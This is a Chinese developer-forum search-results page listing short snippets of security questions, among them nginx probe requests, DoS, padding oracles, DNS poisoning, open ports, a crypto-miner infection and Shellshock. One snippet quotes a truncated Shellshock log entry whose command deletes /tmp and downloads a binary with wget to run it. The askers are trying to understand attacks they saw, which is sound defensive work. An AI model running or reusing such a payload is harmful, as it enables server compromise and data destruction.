腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
1
回答
为什么从nginx请求shell命令?
、
218.161.62.117 - - "GET / HTTP/1.1" 400 157 "-" "-"不用说,对于这个
服务器
来说我想这些都是自动的黑客
攻击
。但是从nginx请求shell命令的逻辑是什么呢?对于nginx来说,允许访问shell是常见的吗?有可能从这些条目中
判断
哪
浏览 0
提问于2020-07-09
得票数 4
1
回答
黑客可以使用我的SSL证书和密钥做什么?
、
、
、
如果我把我在mydomaindotcom网站上使用的SSL证书和私钥给一些黑客,黑客能以任何方式劫持/拦截连接或误用吗?
浏览 3
提问于2020-04-12
得票数 0
回答已采纳
1
回答
DOS安全的替代方案,以延迟对
攻击
者的响应使用sleep()?
、
tl;睡眠()花费了我的
服务器
资源。使用它来延迟对
攻击
者的响应可能会花费他/她的时间,但允许DOS。能让他/她等着而不用花我的钱吗?Long首先,在愤怒中,我想我会很聪明,只是不回答请求,让
攻击
者“永远等待”,因此我想我会使用睡眠(30)。然后,我发现这为
攻击
者打开了一扇门(特别是当使用超过一个IP的DDos )来驱动我的
服务器
负载通过屋顶,因为每个“悬空”
浏览 0
提问于2014-03-10
得票数 6
1
回答
通过网络活动识别
攻击
、
、
是否有可能(以及
如何
)从网络转储中
判断
是否存在缓冲区溢出
攻击
、DoS
攻击
或暴力
攻击
?一个DDoS可能更容易识别,但我认为上面提到的那些
攻击
看起来更像是正常的活动。任何有关
如何
从网络转储中识别这些
攻击
的信息都将不胜感激。
浏览 0
提问于2014-08-11
得票数 0
回答已采纳
1
回答
在Amazon上进行黑客
攻击
(使用wget将文件上传到
服务器
)
、
、
、
我在查看日志时发现了一条非常奇怪的线条。 周五6月26日21:21:36.420706 2015年pid 21172目标WSGI脚本未找到或无法统计: /opt/python/current/app/application.py . By,referer:{ :;};/bin/bash -c "rm -rf /tmp/*;echo wget -O /tmp/ China.Z -foxr >> /tmp/Run.sh;由China.Z >> /tmp/Run.sh回波;echo chmod 777 /tmp/tmp/.echo /tmp/China.Z-fox
浏览 4
提问于2015-06-27
得票数 2
1
回答
填充甲骨文
攻击
有实际后果吗?
、
、
我正在编写一个用Python加密数据并听说填充甲骨文
攻击
的程序,但我认为它们
被
高估了(我的意思是,真实世界的用途是什么?)即使对于易受
攻击
的旧实现(
判断
填充是对还是错的实现,比如SSLv3)。因为: 如果我只需要两个密文c(n-1),c(n),这是最后两个加密消息块,以及一个
服务器
来告诉我解密的c(n)的填充是否正确,这不意味着
服务器
只是解密发送给它的所有内容(我的意思是,在收到加密消息时发送整个加密消息并读取输出我的意思是,这是一个
服务器
错误,它一开始不需要一个键,并
浏览 0
提问于2020-08-18
得票数 2
回答已采纳
2
回答
在iOS 7中保护应用程序中的购买
、
、
、
在iOS 6及以下版本上,希望实现收据验证,以确保IAPs不会被“黑客
攻击
”,并且免费获得而无需实际付费。我的问题是,iOS 7是否仍然容易受到这些IAP
攻击
/旁路
攻击
(自定义DNS、InAppstore黑客等)的
攻击
?如果是这样,
如何
在iOS 7中保护IAPs?
浏览 6
提问于2013-09-21
得票数 0
回答已采纳
1
回答
DNS缓存中毒和事务ID
我读了很多关于它的文章,我不明白为什么缓存中毒是可能的,如果:递归解析器一次只发送一个相同域/类型/类的请求,这意味着
攻击
者不能触发多个相同域的请求来强制执行事务ID。在看似基本的配置中,如果
攻击
者需要猜测事务ID,缓存中毒是
如何
发生的?
攻击
者是否会迫使递归解析器一次又一次地解析同一个域,以便进行更多的尝试?在这种情况下可能需要几个小时..。
浏览 0
提问于2020-12-09
得票数 1
回答已采纳
1
回答
神谕
如何
判断
请求是否
被
中间的人
攻击
了?
、
、
甲骨文机器
如何
确定HTTP请求是否受到中间人的
攻击
,例如返回的结果是否
被
中间人篡改?希望你能帮我!谢谢!
浏览 0
提问于2021-03-22
得票数 0
回答已采纳
1
回答
如何
判断
我的客户端是否正在运行安全连接(SSL)
、
、
、
如何
判断
客户端是否使用安全连接?我可以在浏览器中使用javascript,但这是不安全的(因为
攻击
者可以绕过它) 节点
服务器
可能以HTTP的形式运行,但在安全的nginx/apache代理后面运行。
浏览 1
提问于2017-04-17
得票数 0
1
回答
我应该在我的电子商务网站上给予代理用户优惠待遇吗?
、
我可以想象来自任何地方的访问者,不管出于什么原因,有些人会通过代理
服务器
进行连接。这是有问题的,因为很难
判断
用户是否真的在浏览我的网站,或者是否正在进行DOS。
浏览 0
提问于2014-05-11
得票数 0
3
回答
Web
服务器
上的开放端口25是否危险?
、
、
、
web
服务器
的端口25是开放的。我们没有任何电子邮件
服务器
,因为我们使用谷歌邮件
服务器
,但端口25仍然是开放的。开着它危险吗? 如果它可以
被
攻击
,那么它
如何
被
攻击
呢?
浏览 0
提问于2017-07-17
得票数 1
回答已采纳
3
回答
服务器
被
攻击
?
、
、
、
7.25号购买了一个月,8.24号续费的,今天有
攻击
,想换国内硬防
服务器
,申请退剩余时间,结果说续费不能退,要从7.25算 5天内才可以退,人家阿里云就可以退剩余时间,真是服了,我国内
服务器
也打算用腾讯云的
浏览 748
提问于2018-08-28
1
回答
服务器
被
攻击
?
、
、
、
、
昨天
服务器
被
植入恶意软件,cpu占用率到100%,删除恶意软件之后,今天腾讯云提示我还检测到有挖坑风险,将封号处理。该怎么处理。
浏览 110
提问于2024-04-16
1
回答
我的
服务器
被黑了,我只需要找到cronjob命令。
、
、
病毒运行了一些进程,名为模块,吃cpu,我的
服务器
供应商告诉我,这是比特币矿工病毒,但他们没有给我任何其他信息。
浏览 0
提问于2017-01-09
得票数 1
2
回答
查找有关CVE-2006-6876漏洞的信息。
、
、
、
为了研究SIP
服务器
的漏洞以及DOS
攻击
对QoS of VoIP服务的影响,我发现此漏洞可以
被
利用在SIP
服务器
上引发DoS。
攻击
者
如何
可能造成溢出?OpenSER上可能发生的溢出
攻击
和拒绝服务
攻击
之间的关系是什么? 我不了解
攻击
者的描述和执行的操作。
浏览 0
提问于2012-06-22
得票数 0
回答已采纳
1
回答
永恒的定时
攻击
和响应抖动
、
、
、
、
我一直在研究永恒的定时
攻击
,即使用并发性的定时
攻击
,而不是往返时间。这里是portswigger的一篇文章,它的链接指向梵歌德的原始文章。我理解当从客户端=>
服务器
进入时,这是
如何
工作的,但是当
服务器
响应时,HTTP响应再次出现在不同的数据包中,所以它们不会在返回途中受到抖动的影响,并且可能会出现故障吗?
浏览 0
提问于2021-02-22
得票数 2
回答已采纳
1
回答
Mutillidae XSS滤波器旁路
、
、
我在用mutillidae来提高我的黑客技能。我正在尝试利用用户名字段中的XSS,在注册表单字段中使用toogle安全5,我尝试了我所知道的一切,但我仍然没有设法利用它。<input htmlandxssandsqlinjectionpoint="1" name="username" size="15" autofocus="autofocus" minlength="1" maxlength="15" required="required"
浏览 0
提问于2017-05-01
得票数 0
1
回答
作为一个OAuth
服务器
,我应该
如何
生成和存储OAuth 2.0令牌?
、
我看到了OAuth
服务器
的实现,这些实现似乎建议将这个随机字符串直接存储在数据库中并进行查找。令牌本质上是用户的另一个密码。这是因为如果数据库
被
破坏,那么
攻击
者所要做的就是传递auth_token=code并模拟具有有效令牌的任何用户。 为OAuth 2生成和存储授权令牌的最佳方法是什么?
浏览 0
提问于2013-02-25
得票数 3
1
回答
只有启用cgi的Shell休克才能利用
服务器
吗?
、
、
带有易受
攻击
的bash的
服务器
,但只启用cgi,而且cgi-bin中没有cgi脚本。它还可以利用吗?? 在大多数支持cgi的
服务器
中,默认脚本名是什么?
浏览 0
提问于2014-09-28
得票数 2
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
怎么判断服务器是否被DDoS恶意攻击?
游戏公司如何判断是否被DDOS攻击?
如何判断 Linux 服务器是否被入侵?
服务器被DDoS攻击?如何缓解DDoS攻击?
如何判断自己的服务器是否被入侵
热门
标签
更多标签
云服务器
ICP备案
对象存储
腾讯会议
实时音视频
活动推荐
运营活动
广告
关闭
领券